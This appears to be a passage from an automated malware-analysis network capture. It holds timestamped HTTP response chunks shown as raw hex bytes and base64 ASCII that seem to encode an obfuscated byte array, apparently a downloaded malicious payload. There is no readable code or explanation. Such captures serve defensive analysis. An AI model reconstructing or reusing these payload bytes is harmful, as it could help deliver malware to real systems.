                                                                Data Ascii: EZFLGBFNCxgNUYsYDhFLGBDRixgOUUsYDA1LGA5RixgQzEsYDlGLGBGQyxgN0IsYEM4LGA3RixgQUYsYEZGLGBERSxgQjAsYEUzLGBERixgM0UsYEZELGAxRCxgOUUsYEZGLGBBNixgN0YsYDgyLGA3NCxgRkMsYDNCLGA1MCxgQzcsYEJGLGBGRCxgNEYsYEZELGBFNixgQkYsYDAzLGBFNSxgNzYsYEUxLGBFOSxgRkYsYEQ1LGA1NyxgQ0Is
                                                                2021-12-02 20:47:22 UTC125INData Raw: 42 47 51 53 78 67 4d 44 63 73 59 45 56 45 4c 47 42 43 4d 79 78 67 52 6a 51 73 59 45 56 47 4c 47 42 47 51 69 78 67 52 54 4d 73 59 44 64 47 4c 47 42 47 4e 53 78 67 4d 30 59 73 59 45 59 31 4c 47 41 33 51 69 78 67 52 6b 59 73 59 44 55 30 4c 47 41 31 51 53 78 67 52 6b 51 73 59 44 5a 45 4c 47 42 42 4e 79 78 67 4e 6a 55 73 59 44 64 42 4c 47 42 47 52 53 78 67 52 55 55 73 59 45 59 33 4c 47 41 7a 51 53 78 67 52 6a 67 73 59 44 64 45 4c 47 42 45 4d 69 78 67 52 6a 59 73 59 45 4e 46 4c 47 42 45 52 69 78 67 52 6b 49 73 59 45 52 43 4c 47 42 42 4e 69 78 67 51 6b 59 73 59 45 4e 43 4c 47 42 43 4d 79 78 67 52 6b 59 73 59 45 5a 43 4c 47 41 7a 4e 79 78 67 52 6b 4d 73 59 45 45 35 4c 47 42 45 52 69 78 67 4f 55 49 73 59 44 63 34 4c 47 41 79 52 69 78 67 4e 45 59 73 59 45 5a 47 4c
                                                                Data Ascii: BGQSxgMDcsYEVELGBCMyxgRjQsYEVGLGBGQixgRTMsYDdGLGBGNSxgM0YsYEY1LGA3QixgRkYsYDU0LGA1QSxgRkQsYDZELGBBNyxgNjUsYDdBLGBGRSxgRUUsYEY3LGAzQSxgRjgsYDdELGBEMixgRjYsYENFLGBERixgRkIsYERCLGBBNixgQkYsYENCLGBCMyxgRkYsYEZCLGAzNyxgRkMsYEE5LGBERixgOUIsYDc4LGAyRixgNEYsYEZGL
                                                                2021-12-02 20:47:22 UTC128INData Raw: 31 4c 47 42 47 4e 43 78 67 4e 6a 4d 73 59 44 4d 30 4c 47 42 42 4e 69 78 67 4e 55 59 73 59 45 4d 77 4c 47 41 77 4f 53 78 67 52 44 49 73 59 45 52 47 4c 47 41 7a 4d 43 78 67 52 6b 51 73 59 44 4d 33 4c 47 42 47 52 69 78 67 51 6a 49 73 59 44 4a 47 4c 47 41 31 52 69 78 67 52 6b 59 73 59 45 4d 32 4c 47 41 7a 52 69 78 67 4e 7a 59 73 59 44 6c 46 4c 47 42 47 52 53 78 67 4e 44 6b 73 59 45 4a 47 4c 47 42 46 51 53 78 67 51 30 59 73 59 45 5a 43 4c 47 42 44 52 43 78 67 4f 44 6b 73 59 44 4a 43 4c 47 41 7a 52 53 78 67 52 6b 45 73 59 44 4a 45 4c 47 42 43 52 53 78 67 52 6a 55 73 59 44 45 33 4c 47 42 47 52 69 78 67 4d 30 55 73 59 45 55 35 4c 47 42 46 52 69 78 67 52 6a 45 73 59 45 51 35 4c 47 41 33 52 69 78 67 4f 54 51 73 59 44 6b 7a 4c 47 41 30 4e 69 78 67 4d 30 45 73 59 45
                                                                Data Ascii: 1LGBGNCxgNjMsYDM0LGBBNixgNUYsYEMwLGAwOSxgRDIsYERGLGAzMCxgRkQsYDM3LGBGRixgQjIsYDJGLGA1RixgRkYsYEM2LGAzRixgNzYsYDlFLGBGRSxgNDksYEJGLGBFQSxgQ0YsYEZCLGBDRCxgODksYDJCLGAzRSxgRkEsYDJELGBCRSxgRjUsYDE3LGBGRixgM0UsYEU5LGBFRixgRjEsYEQ5LGA3RixgOTQsYDkzLGA0NixgM0EsYE
                                                                2021-12-02 20:47:22 UTC132INData Raw: 52 69 78 67 4d 6a 6b 73 59 45 52 46 4c 47 42 47 51 69 78 67 51 7a 6b 73 59 45 52 47 4c 47 42 47 4e 53 78 67 4d 55 59 73 59 45 5a 45 4c 47 41 33 4e 79 78 67 52 44 4d 73 59 45 5a 44 4c 47 41 79 52 69 78 67 52 6b 59 73 59 44 51 31 4c 47 41 7a 52 69 78 67 52 55 51 73 59 45 4a 47 4c 47 42 47 4e 79 78 67 52 45 49 73 59 45 59 35 4c 47 41 33 4f 43 78 67 52 6b 59 73 59 44 52 46 4c 47 41 33 52 69 78 67 51 30 55 73 59 45 51 32 4c 47 42 42 52 69 78 67 4d 45 49 73 59 45 4a 44 4c 47 41 33 52 69 78 67 4d 30 51 73 59 45 4d 32 4c 47 41 35 51 69 78 67 4d 6a 49 73 59 45 45 30 4c 47 42 45 52 43 78 67 4d 45 55 73 59 44 6c 44 4c 47 41 33 52 69 78 67 4d 54 49 73 59 44 6b 35 4c 47 42 46 51 53 78 67 51 6b 59 73 59 45 55 79 4c 47 42 45 4e 79 78 67 52 6b 51 73 59 44 4a 45 4c 47 42
                                                                Data Ascii: RixgMjksYERFLGBGQixgQzksYERGLGBGNSxgMUYsYEZELGA3NyxgRDMsYEZDLGAyRixgRkYsYDQ1LGAzRixgRUQsYEJGLGBGNyxgREIsYEY5LGA3OCxgRkYsYDRFLGA3RixgQ0UsYEQ2LGBBRixgMEIsYEJDLGA3RixgM0QsYEM2LGA5QixgMjIsYEE0LGBERCxgMEUsYDlDLGA3RixgMTIsYDk5LGBFQSxgQkYsYEUyLGBENyxgRkQsYDJELGB
                                                                2021-12-02 20:47:22 UTC136INData Raw: 6b 59 73 59 45 56 46 4c 47 42 43 52 69 78 67 52 6a 63 73 59 45 59 33 4c 47 42 47 4f 53 78 67 51 6b 51 73 59 45 4e 47 4c 47 42 45 4d 79 78 67 4e 30 59 73 59 45 56 45 4c 47 42 47 4e 79 78 67 52 6a 67 73 59 45 55 7a 4c 47 42 47 52 69 78 67 4f 54 49 73 59 45 59 30 4c 47 42 47 4e 79 78 67 52 6b 45 73 59 44 52 47 4c 47 42 47 52 53 78 67 4f 45 4d 73 59 44 64 47 4c 47 42 47 4f 43 78 67 51 54 63 73 59 45 4e 46 4c 47 42 44 52 69 78 67 4e 30 59 73 59 45 56 47 4c 47 42 47 4e 43 78 67 52 6a 63 73 59 45 5a 46 4c 47 41 79 4e 79 78 67 4d 30 55 73 59 45 5a 46 4c 47 42 42 4d 79 78 67 52 44 49 73 59 45 4d 35 4c 47 42 45 52 69 78 67 52 6a 67 73 59 44 46 43 4c 47 41 34 51 79 78 67 4e 30 59 73 59 44 6c 47 4c 47 42 47 4d 79 78 67 52 6a 51 73 59 44 68 47 4c 47 42 47 51 79 78 67
                                                                Data Ascii: kYsYEVFLGBCRixgRjcsYEY3LGBGOSxgQkQsYENGLGBEMyxgN0YsYEVELGBGNyxgRjgsYEUzLGBGRixgOTIsYEY0LGBGNyxgRkEsYDRGLGBGRSxgOEMsYDdGLGBGOCxgQTcsYENFLGBDRixgN0YsYEVGLGBGNCxgRjcsYEZFLGAyNyxgM0UsYEZFLGBBMyxgRDIsYEM5LGBERixgRjgsYDFCLGA4QyxgN0YsYDlGLGBGMyxgRjQsYDhGLGBGQyxg
                                                                2021-12-02 20:47:22 UTC140INData Raw: 63 7a 4c 47 42 46 51 53 78 67 52 6b 55 73 59 44 52 47 4c 47 42 42 4e 69 78 67 52 45 59 73 59 44 56 43 4c 47 42 47 51 53 78 67 52 6b 59 73 59 44 4e 47 4c 47 41 30 4e 69 78 67 52 6b 59 73 59 45 5a 47 4c 47 41 33 51 69 78 67 52 54 6b 73 59 45 4a 43 4c 47 42 45 52 69 78 67 4f 45 51 73 59 45 5a 46 4c 47 42 47 52 69 78 67 4e 54 63 73 59 45 5a 44 4c 47 41 31 51 53 78 67 4d 6a 49 73 59 45 4a 42 4c 47 42 43 52 69 78 67 4d 7a 45 73 59 44 64 45 4c 47 41 33 4e 69 78 67 52 6a 41 73 59 44 63 33 4c 47 42 45 4d 43 78 67 4d 55 59 73 59 45 55 35 4c 47 41 32 4e 79 78 67 52 45 59 73 59 45 5a 45 4c 47 42 46 51 69 78 67 52 6b 55 73 59 44 68 45 4c 47 42 47 4e 43 78 67 4e 30 59 73 59 45 5a 44 4c 47 41 30 4e 79 78 67 52 6b 55 73 59 45 5a 43 4c 47 42 46 52 69 78 67 52 6a 67 73 59
                                                                Data Ascii: czLGBFQSxgRkUsYDRGLGBBNixgREYsYDVCLGBGQSxgRkYsYDNGLGA0NixgRkYsYEZGLGA3QixgRTksYEJCLGBERixgOEQsYEZFLGBGRixgNTcsYEZDLGA1QSxgMjIsYEJBLGBCRixgMzEsYDdELGA3NixgRjAsYDc3LGBEMCxgMUYsYEU5LGA2NyxgREYsYEZELGBFQixgRkUsYDhELGBGNCxgN0YsYEZDLGA0NyxgRkUsYEZCLGBFRixgRjgsY
                                                                2021-12-02 20:47:22 UTC144INData Raw: 33 52 69 78 67 52 6a 6b 73 59 45 4a 47 4c 47 41 30 4f 53 78 67 52 55 49 73 59 45 55 31 4c 47 42 43 51 69 78 67 51 6b 59 73 59 45 4e 43 4c 47 42 46 52 69 78 67 4d 54 55 73 59 44 45 35 4c 47 42 47 4e 53 78 67 52 55 59 73 59 44 51 31 4c 47 41 35 4f 43 78 67 4d 30 51 73 59 45 45 30 4c 47 41 31 4f 53 78 67 52 6b 59 73 59 44 41 78 4c 47 41 34 4e 53 78 67 4d 54 41 73 59 45 4a 47 4c 47 41 7a 4e 53 78 67 4d 44 55 73 59 44 4a 47 4c 47 41 33 52 69 78 67 4d 7a 63 73 59 44 59 78 4c 47 42 47 52 43 78 67 4f 54 4d 73 59 44 67 30 4c 47 42 46 4d 53 78 67 4d 30 59 73 59 44 51 32 4c 47 42 43 52 69 78 67 52 6b 59 73 59 44 41 78 4c 47 42 42 4e 43 78 67 4e 30 4d 73 59 44 5a 43 4c 47 41 30 4d 69 78 67 52 55 51 73 59 44 56 47 4c 47 41 79 4d 43 78 67 4e 6b 4d 73 59 45 5a 47 4c 47
                                                                Data Ascii: 3RixgRjksYEJGLGA0OSxgRUIsYEU1LGBCQixgQkYsYENCLGBFRixgMTUsYDE5LGBGNSxgRUYsYDQ1LGA5OCxgM0QsYEE0LGA1OSxgRkYsYDAxLGA4NSxgMTAsYEJGLGAzNSxgMDUsYDJGLGA3RixgMzcsYDYxLGBGRCxgOTMsYDg0LGBFMSxgM0YsYDQ2LGBCRixgRkYsYDAxLGBBNCxgN0MsYDZCLGA0MixgRUQsYDVGLGAyMCxgNkMsYEZGLG
                                                                2021-12-02 20:47:22 UTC148INData Raw: 4f 44 45 73 59 44 4d 33 4c 47 42 47 52 69 78 67 52 6a 51 73 59 44 64 47 4c 47 42 42 52 53 78 67 52 6b 51 73 59 44 41 33 4c 47 42 45 4d 69 78 67 52 45 51 73 59 44 56 47 4c 47 42 47 51 79 78 67 51 55 59 73 59 44 46 44 4c 47 42 47 51 69 78 67 4e 6b 59 73 59 44 46 46 4c 47 42 47 51 79 78 67 52 54 59 73 59 44 4e 43 4c 47 41 35 51 53 78 67 51 30 45 73 59 45 45 79 4c 47 41 7a 4e 79 78 67 4d 45 59 73 59 44 64 46 4c 47 42 42 51 53 78 67 52 6b 55 73 59 44 4e 45 4c 47 41 7a 51 53 78 67 4e 6b 59 73 59 45 5a 46 4c 47 41 78 4d 79 78 67 51 7a 67 73 59 44 59 31 4c 47 42 47 52 43 78 67 51 7a 51 73 59 45 45 7a 4c 47 41 31 52 69 78 67 52 6a 41 73 59 44 42 47 4c 47 42 42 4e 53 78 67 52 45 49 73 59 44 46 47 4c 47 41 33 52 43 78 67 52 6b 55 73 59 45 4e 43 4c 47 42 47 51 79 78
                                                                Data Ascii: ODEsYDM3LGBGRixgRjQsYDdGLGBBRSxgRkQsYDA3LGBEMixgREQsYDVGLGBGQyxgQUYsYDFDLGBGQixgNkYsYDFFLGBGQyxgRTYsYDNCLGA5QSxgQ0EsYEEyLGAzNyxgMEYsYDdFLGBBQSxgRkUsYDNELGAzQSxgNkYsYEZFLGAxMyxgQzgsYDY1LGBGRCxgQzQsYEEzLGA1RixgRjAsYDBGLGBBNSxgREIsYDFGLGA3RCxgRkUsYENCLGBGQyx
                                                                2021-12-02 20:47:22 UTC153INData Raw: 44 46 44 4c 47 41 31 52 53 78 67 52 6b 51 73 59 45 52 47 4c 47 42 46 52 53 78 67 52 6b 59 73 59 45 49 7a 4c 47 42 47 52 69 78 67 4e 6a 63 73 59 45 5a 42 4c 47 42 42 52 69 78 67 4d 55 55 73 59 45 5a 47 4c 47 42 45 52 53 78 67 51 7a 45 73 59 45 4d 79 4c 47 42 45 52 43 78 67 52 6b 55 73 59 44 5a 47 4c 47 42 43 52 53 78 67 52 6a 4d 73 59 45 52 43 4c 47 41 31 51 53 78 67 52 44 6b 73 59 45 52 46 4c 47 42 47 52 69 78 67 51 54 6b 73 59 45 5a 42 4c 47 41 33 51 69 78 67 4f 55 51 73 59 44 4d 33 4c 47 41 31 52 69 78 67 52 54 45 73 59 45 4e 45 4c 47 41 35 4d 79 78 67 52 6b 59 73 59 45 56 43 4c 47 41 7a 52 69 78 67 52 6b 45 73 59 44 51 33 4c 47 42 45 4d 79 78 67 52 45 59 73 59 45 55 31 4c 47 41 35 52 69 78 67 52 6b 49 73 59 44 6c 43 4c 47 41 7a 52 53 78 67 52 6a 63 73
                                                                Data Ascii: DFDLGA1RSxgRkQsYERGLGBFRSxgRkYsYEIzLGBGRixgNjcsYEZBLGBBRixgMUUsYEZGLGBERSxgQzEsYEMyLGBERCxgRkUsYDZGLGBCRSxgRjMsYERCLGA1QSxgRDksYERFLGBGRixgQTksYEZBLGA3QixgOUQsYDM3LGA1RixgRTEsYENELGA5MyxgRkYsYEVCLGAzRixgRkEsYDQ3LGBEMyxgREYsYEU1LGA5RixgRkIsYDlCLGAzRSxgRjcs
                                                                2021-12-02 20:47:22 UTC157INData Raw: 42 47 52 53 78 67 52 54 49 73 59 45 52 47 4c 47 42 46 4d 69 78 67 52 44 63 73 59 45 5a 46 4c 47 42 43 52 69 78 67 4e 30 55 73 59 45 56 43 4c 47 42 45 52 69 78 67 4e 45 4d 73 59 44 59 32 4c 47 42 47 4e 43 78 67 4d 54 63 73 59 44 6b 7a 4c 47 42 46 4e 69 78 67 52 55 55 73 59 45 4a 44 4c 47 42 47 4f 43 78 67 51 55 59 73 59 45 5a 44 4c 47 41 34 52 69 78 67 52 6a 51 73 59 45 55 79 4c 47 42 47 52 69 78 67 4e 7a 51 73 59 44 63 35 4c 47 42 47 52 53 78 67 4e 7a 63 73 59 45 45 32 4c 47 42 43 52 69 78 67 51 30 51 73 59 44 56 47 4c 47 42 47 51 69 78 67 51 55 59 73 59 44 41 30 4c 47 42 42 4d 53 78 67 52 44 4d 73 59 44 49 31 4c 47 41 34 4d 69 78 67 51 55 51 73 59 44 52 43 4c 47 42 45 4d 69 78 67 52 44 67 73 59 44 6c 45 4c 47 41 7a 4e 79 78 67 52 6b 55 73 59 44 49 79 4c
                                                                Data Ascii: BGRSxgRTIsYERGLGBFMixgRDcsYEZFLGBCRixgN0UsYEVCLGBERixgNEMsYDY2LGBGNCxgMTcsYDkzLGBFNixgRUUsYEJDLGBGOCxgQUYsYEZDLGA4RixgRjQsYEUyLGBGRixgNzQsYDc5LGBGRSxgNzcsYEE2LGBCRixgQ0QsYDVGLGBGQixgQUYsYDA0LGBBMSxgRDMsYDI1LGA4MixgQUQsYDRCLGBEMixgRDgsYDlELGAzNyxgRkUsYDIyL
                                                                2021-12-02 20:47:22 UTC160INData Raw: 47 4c 47 42 45 52 69 78 67 52 6b 59 73 59 44 49 32 4c 47 41 35 4e 43 78 67 4d 54 49 73 59 45 5a 42 4c 47 41 32 52 69 78 67 4e 6a 6b 73 59 44 4e 44 4c 47 42 43 52 69 78 67 4d 6a 63 73 59 45 5a 45 4c 47 42 47 52 43 78 67 4d 6a 55 73 59 45 5a 45 4c 47 41 35 52 43 78 67 52 44 4d 73 59 44 45 34 4c 47 42 47 52 53 78 67 4e 7a 51 73 59 44 67 79 4c 47 42 47 4e 53 78 67 4d 55 49 73 59 44 55 77 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 41 79 4c 47 42 43 4e 53 78 67 52 6b 51 73 59 44 6c 47 4c 47 42 42 4f 53 78 67 51 55 59 73 59 45 52 47 4c 47 41 35 4f 53 78 67 52 6a 41 73 59 45 5a 43 4c 47 41 32 4f 53 78 67 51 7a 49 73 59 45 55 7a 4c 47 41 30 52 69 78 67 4d 6a 63 73 59 45 51 34 4c 47 41 33 52 69 78 67 4d 6a 67 73 59 45 59 31 4c 47 42 47 4f 53 78 67 4f 54 51 73 59 45
                                                                Data Ascii: GLGBERixgRkYsYDI2LGA5NCxgMTIsYEZBLGA2RixgNjksYDNDLGBCRixgMjcsYEZELGBGRCxgMjUsYEZELGA5RCxgRDMsYDE4LGBGRSxgNzQsYDgyLGBGNSxgMUIsYDUwLGBGRixgRkYsYDAyLGBCNSxgRkQsYDlGLGBBOSxgQUYsYERGLGA5OSxgRjAsYEZCLGA2OSxgQzIsYEUzLGA0RixgMjcsYEQ4LGA3RixgMjgsYEY1LGBGOSxgOTQsYE
                                                                2021-12-02 20:47:22 UTC164INData Raw: 4d 53 78 67 52 6a 45 73 59 44 67 33 4c 47 42 47 52 69 78 67 52 44 51 73 59 44 5a 47 4c 47 42 47 52 53 78 67 4e 44 63 73 59 44 59 30 4c 47 41 77 4e 79 78 67 4e 30 59 73 59 44 45 79 4c 47 41 33 4d 69 78 67 4e 44 63 73 59 45 4d 33 4c 47 42 47 52 69 78 67 52 44 59 73 59 44 64 47 4c 47 42 47 4f 43 78 67 4f 54 4d 73 59 45 55 35 4c 47 42 47 52 69 78 67 4e 7a 67 73 59 45 59 33 4c 47 42 47 52 69 78 67 52 6b 45 73 59 44 55 33 4c 47 41 33 51 79 78 67 51 54 51 73 59 45 5a 47 4c 47 42 43 4e 43 78 67 4e 55 59 73 59 44 6c 42 4c 47 42 44 4f 43 78 67 4e 6b 4d 73 59 45 5a 46 4c 47 42 47 4e 69 78 67 51 6b 59 73 59 45 59 33 4c 47 41 32 52 69 78 67 52 6b 59 73 59 44 64 43 4c 47 41 32 52 69 78 67 52 6b 51 73 59 45 52 42 4c 47 41 31 4d 43 78 67 4e 44 45 73 59 45 4a 47 4c 47 41
                                                                Data Ascii: MSxgRjEsYDg3LGBGRixgRDQsYDZGLGBGRSxgNDcsYDY0LGAwNyxgN0YsYDEyLGA3MixgNDcsYEM3LGBGRixgRDYsYDdGLGBGOCxgOTMsYEU5LGBGRixgNzgsYEY3LGBGRixgRkEsYDU3LGA3QyxgQTQsYEZGLGBCNCxgNUYsYDlBLGBDOCxgNkMsYEZFLGBGNixgQkYsYEY3LGA2RixgRkYsYDdCLGA2RixgRkQsYERBLGA1MCxgNDEsYEJGLGA
                                                                2021-12-02 20:47:22 UTC168INData Raw: 6a 49 73 59 44 64 47 4c 47 42 46 52 69 78 67 52 45 59 73 59 45 59 79 4c 47 41 77 52 69 78 67 4f 44 45 73 59 44 55 30 4c 47 42 47 52 53 78 67 4d 6a 45 73 59 44 4e 47 4c 47 41 31 4e 53 78 67 51 6b 59 73 59 45 56 45 4c 47 41 79 4d 43 78 67 52 6a 41 73 59 44 45 77 4c 47 41 77 4f 43 78 67 52 6b 4d 73 59 45 55 32 4c 47 41 34 4e 43 78 67 51 7a 41 73 59 44 56 47 4c 47 42 47 4d 43 78 67 4f 45 49 73 59 45 4a 47 4c 47 42 47 4f 43 78 67 4e 45 51 73 59 44 67 77 4c 47 42 44 4d 43 78 67 4f 55 59 73 59 45 59 77 4c 47 42 46 4d 79 78 67 51 7a 6b 73 59 44 64 47 4c 47 42 45 4f 53 78 67 4e 44 45 73 59 45 55 77 4c 47 41 77 52 69 78 67 4f 45 51 73 59 44 49 77 4c 47 42 47 4d 43 78 67 4f 45 59 73 59 45 4d 33 4c 47 41 78 4d 53 78 67 52 6a 67 73 59 44 5a 47 4c 47 41 35 4d 43 78 67
                                                                Data Ascii: jIsYDdGLGBFRixgREYsYEYyLGAwRixgODEsYDU0LGBGRSxgMjEsYDNGLGA1NSxgQkYsYEVELGAyMCxgRjAsYDEwLGAwOCxgRkMsYEU2LGA4NCxgQzAsYDVGLGBGMCxgOEIsYEJGLGBGOCxgNEQsYDgwLGBDMCxgOUYsYEYwLGBFMyxgQzksYDdGLGBEOSxgNDEsYEUwLGAwRixgOEQsYDIwLGBGMCxgOEYsYEM3LGAxMSxgRjgsYDZGLGA5MCxg
                                                                2021-12-02 20:47:22 UTC172INData Raw: 46 42 4c 47 42 42 4e 53 78 67 52 44 55 73 59 45 56 46 4c 47 42 47 52 69 78 67 4e 6a 41 73 59 44 67 30 4c 47 42 46 4f 53 78 67 4e 7a 63 73 59 44 63 35 4c 47 41 79 51 79 78 67 52 6b 51 73 59 45 5a 46 4c 47 41 7a 51 53 78 67 52 54 6b 73 59 45 49 7a 4c 47 41 7a 52 69 78 67 52 54 4d 73 59 44 4d 33 4c 47 42 47 4d 79 78 67 4d 54 59 73 59 45 4a 43 4c 47 41 77 52 53 78 67 4e 30 55 73 59 44 6b 7a 4c 47 42 47 52 69 78 67 4d 44 45 73 59 44 52 44 4c 47 41 33 4e 43 78 67 52 6a 51 73 59 44 4a 43 4c 47 41 34 52 53 78 67 4d 55 45 73 59 45 56 47 4c 47 42 44 4d 79 78 67 4e 55 59 73 59 44 51 31 4c 47 41 32 4f 53 78 67 4d 6a 4d 73 59 44 4d 79 4c 47 41 35 4e 43 78 67 51 6b 59 73 59 44 41 78 4c 47 41 78 4d 53 78 67 52 55 51 73 59 45 49 33 4c 47 41 30 4f 53 78 67 4d 55 59 73 59
                                                                Data Ascii: FBLGBBNSxgRDUsYEVFLGBGRixgNjAsYDg0LGBFOSxgNzcsYDc5LGAyQyxgRkQsYEZFLGAzQSxgRTksYEIzLGAzRixgRTMsYDM3LGBGMyxgMTYsYEJCLGAwRSxgN0UsYDkzLGBGRixgMDEsYDRDLGA3NCxgRjQsYDJCLGA4RSxgMUEsYEVGLGBDMyxgNUYsYDQ1LGA2OSxgMjMsYDMyLGA5NCxgQkYsYDAxLGAxMSxgRUQsYEI3LGA0OSxgMUYsY
                                                                2021-12-02 20:47:22 UTC176INData Raw: 43 4e 79 78 67 52 6b 45 73 59 44 4a 45 4c 47 41 33 52 53 78 67 51 55 51 73 59 45 52 47 4c 47 42 46 4d 69 78 67 52 44 63 73 59 45 46 46 4c 47 41 33 52 53 78 67 4f 44 45 73 59 45 4e 46 4c 47 42 47 4f 53 78 67 4e 6b 59 73 59 44 52 46 4c 47 41 79 4d 79 78 67 52 6b 59 73 59 44 6b 35 4c 47 41 35 52 69 78 67 51 55 45 73 59 45 5a 47 4c 47 42 47 4f 53 78 67 51 30 55 73 59 45 4d 34 4c 47 42 47 52 69 78 67 52 54 55 73 59 45 5a 47 4c 47 41 77 51 53 78 67 4d 45 4d 73 59 44 4d 31 4c 47 41 33 52 43 78 67 52 6a 59 73 59 45 5a 45 4c 47 41 79 52 69 78 67 4d 30 4d 73 59 44 67 32 4c 47 42 47 51 53 78 67 52 6b 49 73 59 45 55 34 4c 47 42 44 4d 79 78 67 52 45 59 73 59 45 5a 44 4c 47 42 43 4e 79 78 67 4d 6a 63 73 59 45 5a 44 4c 47 42 47 52 69 78 67 52 6a 55 73 59 44 6c 47 4c 47
                                                                Data Ascii: CNyxgRkEsYDJELGA3RSxgQUQsYERGLGBFMixgRDcsYEFFLGA3RSxgODEsYENFLGBGOSxgNkYsYDRFLGAyMyxgRkYsYDk5LGA5RixgQUEsYEZGLGBGOSxgQ0UsYEM4LGBGRixgRTUsYEZGLGAwQSxgMEMsYDM1LGA3RCxgRjYsYEZELGAyRixgM0MsYDg2LGBGQSxgRkIsYEU4LGBDMyxgREYsYEZDLGBCNyxgMjcsYEZDLGBGRixgRjUsYDlGLG
                                                                2021-12-02 20:47:22 UTC180INData Raw: 4e 45 49 73 59 44 64 47 4c 47 41 7a 4d 79 78 67 52 44 67 73 59 44 68 43 4c 47 41 31 52 69 78 67 52 55 59 73 59 45 49 33 4c 47 42 45 4f 53 78 67 52 6b 45 73 59 45 46 45 4c 47 42 42 4f 43 78 67 51 7a 63 73 59 44 46 47 4c 47 42 47 51 69 78 67 51 30 51 73 59 44 64 47 4c 47 41 7a 52 43 78 67 51 30 45 73 59 44 5a 42 4c 47 41 35 51 79 78 67 4f 44 55 73 59 44 4a 47 4c 47 42 47 52 69 78 67 4f 55 51 73 59 45 59 30 4c 47 42 47 4d 69 78 67 4e 6b 59 73 59 44 51 77 4c 47 42 42 52 53 78 67 51 7a 6b 73 59 45 59 33 4c 47 41 31 52 69 78 67 52 6b 59 73 59 45 45 31 4c 47 41 33 52 69 78 67 4d 44 51 73 59 45 51 30 4c 47 42 45 51 53 78 67 4d 30 59 73 59 45 59 30 4c 47 41 7a 52 69 78 67 52 6b 51 73 59 45 49 32 4c 47 41 78 52 53 78 67 4d 44 4d 73 59 45 5a 46 4c 47 42 46 52 53 78
                                                                Data Ascii: NEIsYDdGLGAzMyxgRDgsYDhCLGA1RixgRUYsYEI3LGBEOSxgRkEsYEFELGBBOCxgQzcsYDFGLGBGQixgQ0QsYDdGLGAzRCxgQ0EsYDZBLGA5QyxgODUsYDJGLGBGRixgOUQsYEY0LGBGMixgNkYsYDQwLGBBRSxgQzksYEY3LGA1RixgRkYsYEE1LGA3RixgMDQsYEQ0LGBEQSxgM0YsYEY0LGAzRixgRkQsYEI2LGAxRSxgMDMsYEZFLGBFRSx
                                                                2021-12-02 20:47:22 UTC185INData Raw: 45 46 47 4c 47 41 35 51 69 78 67 52 6b 55 73 59 45 4e 47 4c 47 41 33 52 69 78 67 52 6a 55 73 59 44 4a 47 4c 47 42 47 52 69 78 67 52 54 55 73 59 44 6c 46 4c 47 42 47 4e 79 78 67 52 6a 41 73 59 44 6c 43 4c 47 41 77 4d 79 78 67 52 54 59 73 59 45 5a 47 4c 47 42 47 4e 43 78 67 51 54 63 73 59 45 5a 44 4c 47 41 31 4f 53 78 67 4e 30 59 73 59 44 51 79 4c 47 42 43 51 53 78 67 52 6a 67 73 59 45 4e 47 4c 47 42 47 52 53 78 67 52 6a 63 73 59 44 56 47 4c 47 42 46 4f 53 78 67 51 7a 4d 73 59 45 5a 44 4c 47 41 30 52 43 78 67 4d 44 45 73 59 45 59 7a 4c 47 41 7a 4e 79 78 67 4d 6a 55 73 59 44 4e 45 4c 47 42 47 4e 43 78 67 4e 30 49 73 59 44 67 31 4c 47 41 7a 4d 43 78 67 52 6b 59 73 59 44 51 7a 4c 47 41 34 4f 43 78 67 52 54 4d 73 59 45 4a 47 4c 47 42 47 52 43 78 67 52 6a 67 73
                                                                Data Ascii: EFGLGA5QixgRkUsYENGLGA3RixgRjUsYDJGLGBGRixgRTUsYDlFLGBGNyxgRjAsYDlCLGAwMyxgRTYsYEZGLGBGNCxgQTcsYEZDLGA1OSxgN0YsYDQyLGBCQSxgRjgsYENGLGBGRSxgRjcsYDVGLGBFOSxgQzMsYEZDLGA0RCxgMDEsYEYzLGAzNyxgMjUsYDNELGBGNCxgN0IsYDg1LGAzMCxgRkYsYDQzLGA4OCxgRTMsYEJGLGBGRCxgRjgs
                                                                2021-12-02 20:47:22 UTC189INData Raw: 41 33 4f 53 78 67 52 6b 45 73 59 45 56 47 4c 47 41 7a 52 69 78 67 52 6b 59 73 59 44 59 31 4c 47 41 33 52 69 78 67 52 6b 55 73 59 45 59 35 4c 47 42 46 52 69 78 67 52 6b 51 73 59 44 64 43 4c 47 41 32 4e 79 78 67 52 54 63 73 59 45 55 35 4c 47 42 47 4e 79 78 67 52 6b 55 73 59 45 4d 78 4c 47 42 43 52 69 78 67 52 55 4d 73 59 44 64 47 4c 47 41 79 4d 53 78 67 4d 44 4d 73 59 45 59 34 4c 47 42 47 4d 69 78 67 51 6b 59 73 59 45 5a 47 4c 47 41 77 4d 79 78 67 51 7a 59 73 59 45 55 30 4c 47 41 31 52 53 78 67 52 6b 55 73 59 45 4a 42 4c 47 42 43 52 69 78 67 4e 54 4d 73 59 44 67 30 4c 47 41 79 4e 79 78 67 4e 30 55 73 59 44 4e 45 4c 47 41 35 51 53 78 67 52 6b 49 73 59 45 4a 47 4c 47 41 30 4d 69 78 67 4e 7a 6b 73 59 44 41 77 4c 47 42 46 4d 53 78 67 51 7a 41 73 59 44 52 47 4c
                                                                Data Ascii: A3OSxgRkEsYEVGLGAzRixgRkYsYDY1LGA3RixgRkUsYEY5LGBFRixgRkQsYDdCLGA2NyxgRTcsYEU5LGBGNyxgRkUsYEMxLGBCRixgRUMsYDdGLGAyMSxgMDMsYEY4LGBGMixgQkYsYEZGLGAwMyxgQzYsYEU0LGA1RSxgRkUsYEJBLGBCRixgNTMsYDg0LGAyNyxgN0UsYDNELGA5QSxgRkIsYEJGLGA0MixgNzksYDAwLGBFMSxgQzAsYDRGL
